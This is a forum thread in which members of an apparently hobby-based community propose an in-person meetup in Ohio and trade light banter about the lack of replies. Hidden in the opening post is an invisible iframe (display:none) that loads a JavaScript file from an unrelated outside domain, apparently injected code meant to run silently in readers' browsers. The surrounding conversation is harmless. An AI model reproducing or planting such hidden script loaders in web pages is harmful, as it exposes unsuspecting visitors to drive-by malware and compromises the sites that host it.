+ Reply to Thread

Thread: Meet & Greet

Thumbs up Meet & Greet

I had this hair brained idea yesterday morning and wanted to pass it on to everyone.

What would you think about planning a "Meet & Greet", here in Ohio. I know that there are a few of us here in the state and it is centrally located.

Would it not be something to have a bunch of us sitting around shooting the breeze, ok I know we do that here online, but can you imagine real live contact? Ooooh, I can just feel the quizziness of the situation!!!

We could have a photo taken of those who attend with our 300's brandished for all to see.

Just a thought. Let's get some feedback. <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Si hoc Legere Scis Nimium Eruditionis habes.

This thread has been viewed 40 plus times as of today and not one person has replied. I am going to get tetchy and recused.

Nicht wahr?

Originally posted by shhchem
    This thread has been viewed 40 plus times as of today and not one person has replied.
    Ah, assumptions! Your post may have been viewed by 40 people just like me -- who didn't know what you'd said until I'd read it, but only then realized that you weren't talking to me -- for whom Ohio is a 3-day trip. Maybe no one from Ohio has read it yet. Be dude. <g>

Lisa
    The Writers' Collective - no shared royalties, ever.
    www.writerscollective.org

Administrator

Arrow

hello. anybody here??

i am just now reading this post and i was not one of the original 40.. but im in cincinnati and it would be indeed nice to meet some folks in person...

Talking

Well I am here in Columbus, so that is two of us. Let's see who else wants in and we can put something together. I know the man from Chicago likes the idea.

Administrator

Arrow

or we can all meet in the aol chat room?? we should get together there and just chat...